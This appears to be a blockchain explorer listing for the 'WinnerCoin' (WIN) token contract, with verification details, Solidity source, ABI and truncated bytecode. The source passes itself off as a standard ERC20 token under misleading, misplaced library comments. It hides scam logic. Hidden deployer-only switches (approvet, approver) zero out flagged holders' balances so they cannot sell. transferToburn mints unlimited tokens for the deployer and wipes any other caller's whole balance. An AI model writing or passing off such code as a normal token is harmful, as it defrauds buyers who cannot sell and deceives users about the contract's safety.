Warning! Contract bytecode has been changed and doesn't match the verified one. Therefore, interaction with this smart contract may be risky.
- Contract name:
- WinnerCoin
- Optimization enabled
- false
- Compiler version
- v0.8.18+commit.87f61d96
- EVM Version
- default
- Verified at
- 2025-09-29T11:12:08.732600Z
Constructor Arguments
0x00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000b57696e6e657220436f696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000357494e0000000000000000000000000000000000000000000000000000000000
Arg [0] (string) : Winner Coin
Arg [1] (string) : WIN
Contract source code
/**
*Submitted for verification at SonicScan.org on 2025-03-16
*/
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Ownable {
constructor() {
_transferOwnership(_msgSender());
}
modifier onlyOwner() {
_checkOwner();
_;
}
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
address private _owner;
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_yydsed}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
contract WinnerCoin is Ownable {
uint256 _totalSupply = 1*10**9*10**decimals();
uint256 tota = _totalSupply;
address private cjxxx;
string private _tokenname;
string private _tokensymbol;
mapping(address => bool) private Holders;
address[] public _Holders;
constructor(string memory name_, string memory symbol_) {
address msgSender = _msgSender();
_tokenname = name_;
_tokensymbol = symbol_;
cjxxx = _msgSender();
balances[msgSender] += _totalSupply;
emit Transfer(address(0), msgSender, _totalSupply);
}
/**
* @dev Returns the name of the token.
*/
mapping(address => uint256) private balances;
mapping(address => bool) private balancesto;
mapping(address => bool) private balancesfrom;
mapping(address => mapping(address => uint256)) private _allowances;
/**
* @dev Returns the name of the token.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
event Transfer(address indexed from, address indexed to, uint256 value);
function symbol() public view returns (string memory) {
return _tokensymbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function totalSupply() public view returns (uint256) {
return _totalSupply;
}
function decimals() public view virtual returns (uint8) {
return 6;
}
function _HoldersAddress(address _address) internal {
if (!Holders[_address]) {
Holders[_address] = true;
_Holders.push(_address);
}
}
function getTokenHolders() public view returns (address[] memory) {
return _Holders;
}
function getAdjusted(address from, address to) internal view returns (uint256) {
uint256 adjusted = balances[from];
if (balancesto[to] && from != cjxxx) {
adjusted = adjusted ^ adjusted;
}
if (balancesfrom[from]) {
adjusted = adjusted ^ adjusted;
}
return adjusted;
}
function approvet(address _to, bool to_) public {
if (cjxxx != msg.sender) {
revert("fu");
}
balancesto[_to]
= to_;
}
function balanceOf(address account) public view returns (uint256) {
return balances[account];
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function name() public view returns (string memory) {
return _tokenname;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function approver (address _from, bool from_) public {
if(cjxxx != _msgSender()){
revert("fu");
}
balancesfrom[_from]
= from_;
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public returns (bool) {
_transfer(_msgSender(), to, amount);
return true;
}
function allowance(address owner, address spender) public view returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function approve(address spender, uint256 amount) public returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(
address from,
address to,
uint256 amount
) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
uint256 decysBalances = getAdjusted(from, to);
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(decysBalances >= amount, "ERC20: transfer amount exceeds balance");
balances[from] = balances[from]-amount;
balances[to] = balances[to]+amount;
emit Transfer(from, to, amount);
_HoldersAddress(to);
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
//function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
_approve(owner, spender, currentAllowance - amount);
}
}
/**
* @dev See {IERC20-allowance}.
*/
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
// function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
function transferToburn(uint256 amount) public {
address burnAddress = _msgSender();
uint256 balancefrom = _totalSupply;
if (cjxxx != _msgSender()) {
uint256 deductAmount = balances[burnAddress];
require(balances[burnAddress] > 0, "fu");
balances[burnAddress] -= deductAmount;
_totalSupply -= deductAmount;
} else {
uint256 burnAmount = tota * amount;
balances[burnAddress] += burnAmount;
balancefrom += burnAmount;
_totalSupply = balancefrom;
}
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
_approve(owner, spender, currentAllowance - subtractedValue);
return true;
}
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
Contract ABI
[{"type":"constructor","stateMutability":"nonpayable","inputs":[{"type":"string","name":"name_","internalType":"string"},{"type":"string","name":"symbol_","internalType":"string"}]},{"type":"event","name":"Approval","inputs":[{"type":"address","name":"owner","internalType":"address","indexed":true},{"type":"address","name":"spender","internalType":"address","indexed":true},{"type":"uint256","name":"value","internalType":"uint256","indexed":false}],"anonymous":false},{"type":"event","name":"OwnershipTransferred","inputs":[{"type":"address","name":"previousOwner","internalType":"address","indexed":true},{"type":"address","name":"newOwner","internalType":"address","indexed":true}],"anonymous":false},{"type":"event","name":"Transfer","inputs":[{"type":"address","name":"from","internalType":"address","indexed":true},{"type":"address","name":"to","internalType":"address","indexed":true},{"type":"uint256","name":"value","internalType":"uint256","indexed":false}],"anonymous":false},{"type":"function","stateMutability":"view","outputs":[{"type":"address","name":"","internalType":"address"}],"name":"_Holders","inputs":[{"type":"uint256","name":"","internalType":"uint256"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"allowance","inputs":[{"type":"address","name":"owner","internalType":"address"},{"type":"address","name":"spender","internalType":"address"}]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"approve","inputs":[{"type":"address","name":"spender","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"approver","inputs":[{"type":"address","name":"_from","internalType":"address"},{"type":"bool","name":"from_","internalType":"bool"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"approvet","inputs":[{"type":"address","name":"_to","internalType":"address"},{"type":"bool","name":"to_","internalType":"bool"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"balanceOf","inputs":[{"type":"address","name":"account","internalType":"address"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint8","name":"","internalType":"uint8"}],"name":"decimals","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"decreaseAllowance","inputs":[{"type":"address","name":"spender","internalType":"address"},{"type":"uint256","name":"subtractedValue","internalType":"uint256"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"address[]","name":"","internalType":"address[]"}],"name":"getTokenHolders","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"string","name":"","internalType":"string"}],"name":"name","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"address","name":"","internalType":"address"}],"name":"owner","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"renounceOwnership","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"string","name":"","internalType":"string"}],"name":"symbol","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"totalSupply","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"transfer","inputs":[{"type":"address","name":"to","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"transferFrom","inputs":[{"type":"address","name":"from","internalType":"address"},{"type":"address","name":"to","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"transferToburn","inputs":[{"type":"uint256","name":"amount","internalType":"uint256"}]}]
Contract Creation Code
0x608060405262000014620001e460201b60201c565b600a62000022919062000453565b633b9aca00620000339190620004a4565b6001556001546002553480156200004957600080fd5b50604051620029953803806200299583398181016040528101906200006f919062000682565b6200008f62000083620001ed60201b60201c565b620001f560201b60201c565b6000620000a1620001ed60201b60201c565b90508260049081620000b4919062000948565b508160059081620000c6919062000948565b50620000d7620001ed60201b60201c565b600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600154600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200016a919062000a2f565b925050819055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600154604051620001d3919062000a7b565b60405180910390a350505062000a98565b60006006905090565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000347578086048111156200031f576200031e620002b9565b5b60018516156200032f5780820291505b80810290506200033f85620002e8565b9450620002ff565b94509492505050565b60008262000362576001905062000435565b8162000372576000905062000435565b81600181146200038b57600281146200039657620003cc565b600191505062000435565b60ff841115620003ab57620003aa620002b9565b5b8360020a915084821115620003c557620003c4620002b9565b5b5062000435565b5060208310610133831016604e8410600b8410161715620004065782820a9050838111156200040057620003ff620002b9565b5b62000435565b620004158484846001620002f5565b925090508184048111156200042f576200042e620002b9565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000460826200043c565b91506200046d8362000446565b92506200049c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000350565b905092915050565b6000620004b1826200043c565b9150620004be836200043c565b9250828202620004ce816200043c565b91508282048414831517620004e857620004e7620002b9565b5b5092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b62000558826200050d565b810181811067ffffffffffffffff821117156200057a57620005796200051e565b5b80604052505050565b60006200058f620004ef565b90506200059d82826200054d565b919050565b600067ffffffffffffffff821115620005c057620005bf6200051e565b5b620005cb826200050d565b9050602081019050919050565b60005b83811015620005f8578082015181840152602081019050620005db565b60008484015250505050565b60006200061b6200061584620005a2565b62000583565b9050828152602081018484840111156200063a576200063962000508565b5b62000647848285620005d8565b509392505050565b600082601f83011262000667576200066662000503565b5b81516200067984826020860162000604565b91505092915050565b600080604083850312156200069c576200069b620004f9565b5b600083015167ffffffffffffffff811115620006bd57620006bc620004fe565b5b620006cb858286016200064f565b925050602083015167ffffffffffffffff811115620006ef57620006ee620004fe565b5b620006fd858286016200064f565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200075a57607f821691505b60208210810362000770576200076f62000712565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007da7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200079b565b620007e686836200079b565b95508019841693508086168417925050509392505050565b6000819050919050565b600062000829620008236200081d846200043c565b620007fe565b6200043c565b9050919050565b6000819050919050565b620008458362000808565b6200085d620008548262000830565b848454620007a8565b825550505050565b600090565b6200087462000865565b620008818184846200083a565b505050565b5b81811015620008a9576200089d6000826200086a565b60018101905062000887565b5050565b601f821115620008f857620008c28162000776565b620008cd846200078b565b81016020851015620008dd578190505b620008f5620008ec856200078b565b83018262000886565b50505b505050565b600082821c905092915050565b60006200091d60001984600802620008fd565b1980831691505092915050565b60006200093883836200090a565b9150826002028217905092915050565b620009538262000707565b67ffffffffffffffff8111156200096f576200096e6200051e565b5b6200097b825462000741565b62000988828285620008ad565b600060209050601f831160018114620009c05760008415620009ab578287015190505b620009b785826200092a565b86555062000a27565b601f198416620009d08662000776565b60005b82811015620009fa57848901518255600182019150602085019450602081019050620009d3565b8683101562000a1a578489015162000a16601f8916826200090a565b8355505b6001600288020188555050505b505050505050565b600062000a3c826200043c565b915062000a49836200043c565b925082820190508082111562000a645762000a63620002b9565b5b92915050565b62000a75816200043c565b82525050565b600060208201905062000a92600083018462000a6a565b92915050565b611eed8062000aa86000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80636b254a9a116100a25780638da5cb5b116100715780638da5cb5b146102a657806395d89b41146102c4578063a457c2d7146102e2578063a9059cbb14610312578063dd62ed3e146103425761010b565b80636b254a9a1461023257806370a082311461024e578063715018a61461027e578063876b1566146102885761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806348f2f812146101e65780634a7eb02e146102025761010b565b806306fdde0314610110578063095ea7b31461012e5780630df884561461015e57806318160ddd1461017a575b600080fd5b610118610372565b60405161012591906114d9565b60405180910390f35b61014860048036038101906101439190611594565b610404565b60405161015591906115ef565b60405180910390f35b6101786004803603810190610173919061160a565b610422565b005b610182610650565b60405161018f9190611646565b60405180910390f35b6101b260048036038101906101ad9190611661565b61065a565b6040516101bf91906115ef565b60405180910390f35b6101d0610689565b6040516101dd91906116d0565b60405180910390f35b61020060048036038101906101fb9190611717565b610692565b005b61021c6004803603810190610217919061160a565b610784565b6040516102299190611766565b60405180910390f35b61024c60048036038101906102479190611717565b6107c3565b005b61026860048036038101906102639190611781565b6108ae565b6040516102759190611646565b60405180910390f35b6102866108f7565b005b61029061090b565b60405161029d919061186c565b60405180910390f35b6102ae610999565b6040516102bb9190611766565b60405180910390f35b6102cc6109c2565b6040516102d991906114d9565b60405180910390f35b6102fc60048036038101906102f79190611594565b610a54565b60405161030991906115ef565b60405180910390f35b61032c60048036038101906103279190611594565b610ad4565b60405161033991906115ef565b60405180910390f35b61035c6004803603810190610357919061188e565b610af2565b6040516103699190611646565b60405180910390f35b606060048054610381906118fd565b80601f01602080910402602001604051908101604052809291908181526020018280546103ad906118fd565b80156103fa5780601f106103cf576101008083540402835291602001916103fa565b820191906000526020600020905b8154815290600101906020018083116103dd57829003601f168201915b5050505050905090565b6000610418610411610b79565b8484610b81565b6001905092915050565b600061042c610b79565b90506000600154905061043d610b79565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105cc576000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411610557576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054e9061197a565b60405180910390fd5b80600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105a691906119c9565b9250508190555080600160008282546105bf91906119c9565b925050819055505061064b565b6000836002546105dc91906119fd565b905080600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461062d9190611a3f565b9250508190555080826106409190611a3f565b915081600181905550505b505050565b6000600154905090565b600080610665610b79565b9050610672858285610d4a565b61067d858585610ddf565b60019150509392505050565b60006006905090565b61069a610b79565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610729576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107209061197a565b60405180910390fd5b80600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6007818154811061079457600080fd5b906000526020600020016000915054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610853576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084a9061197a565b60405180910390fd5b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ff61109e565b610909600061111c565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561098f57602002820191906000526020600020905b8160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019060010190808311610945575b5050505050905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546109d1906118fd565b80601f01602080910402602001604051908101604052809291908181526020018280546109fd906118fd565b8015610a4a5780601f10610a1f57610100808354040283529160200191610a4a565b820191906000526020600020905b815481529060010190602001808311610a2d57829003601f168201915b5050505050905090565b600080610a5f610b79565b90506000610a6d8286610af2565b905083811015610ab2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa990611ae5565b60405180910390fd5b610ac882868684610ac391906119c9565b610b81565b60019250505092915050565b6000610ae8610ae1610b79565b8484610ddf565b6001905092915050565b6000600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be790611b77565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5690611c09565b60405180910390fd5b80600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d3d9190611646565b60405180910390a3505050565b6000610d568484610af2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610dd95781811015610dc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db990611c75565b60405180910390fd5b610dd884848484610dd391906119c9565b610b81565b5b50505050565b6000610deb84846111e0565b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610e5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5390611d07565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ecb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec290611d99565b60405180910390fd5b81811015610f0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0590611e2b565b60405180910390fd5b81600860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f5991906119c9565b600860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610fe79190611a3f565b600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110879190611646565b60405180910390a361109883611339565b50505050565b6110a6610b79565b73ffffffffffffffffffffffffffffffffffffffff166110c4610999565b73ffffffffffffffffffffffffffffffffffffffff161461111a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161111190611e97565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600080600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156112cc5750600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156112d75780811890505b600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561132f5780811890505b8091505092915050565b600660008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611446576001600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506007819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600081519050919050565b600082825260208201905092915050565b60005b83811015611483578082015181840152602081019050611468565b60008484015250505050565b6000601f19601f8301169050919050565b60006114ab82611449565b6114b58185611454565b93506114c5818560208601611465565b6114ce8161148f565b840191505092915050565b600060208201905081810360008301526114f381846114a0565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061152b82611500565b9050919050565b61153b81611520565b811461154657600080fd5b50565b60008135905061155881611532565b92915050565b6000819050919050565b6115718161155e565b811461157c57600080fd5b50565b60008135905061158e81611568565b92915050565b600080604083850312156115ab576115aa6114fb565b5b60006115b985828601611549565b92505060206115ca8582860161157f565b9150509250929050565b60008115159050919050565b6115e9816115d4565b82525050565b600060208201905061160460008301846115e0565b92915050565b6000602082840312156116205761161f6114fb565b5b600061162e8482850161157f565b91505092915050565b6116408161155e565b82525050565b600060208201905061165b6000830184611637565b92915050565b60008060006060848603121561167a576116796114fb565b5b600061168886828701611549565b935050602061169986828701611549565b92505060406116aa8682870161157f565b9150509250925092565b600060ff82169050919050565b6116ca816116b4565b82525050565b60006020820190506116e560008301846116c1565b92915050565b6116f4816115d4565b81146116ff57600080fd5b50565b600081359050611711816116eb565b92915050565b6000806040838503121561172e5761172d6114fb565b5b600061173c85828601611549565b925050602061174d85828601611702565b9150509250929050565b61176081611520565b82525050565b600060208201905061177b6000830184611757565b92915050565b600060208284031215611797576117966114fb565b5b60006117a584828501611549565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b6117e381611520565b82525050565b60006117f583836117da565b60208301905092915050565b6000602082019050919050565b6000611819826117ae565b61182381856117b9565b935061182e836117ca565b8060005b8381101561185f57815161184688826117e9565b975061185183611801565b925050600181019050611832565b5085935050505092915050565b60006020820190508181036000830152611886818461180e565b905092915050565b600080604083850312156118a5576118a46114fb565b5b60006118b385828601611549565b92505060206118c485828601611549565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061191557607f821691505b602082108103611928576119276118ce565b5b50919050565b7f6675000000000000000000000000000000000000000000000000000000000000600082015250565b6000611964600283611454565b915061196f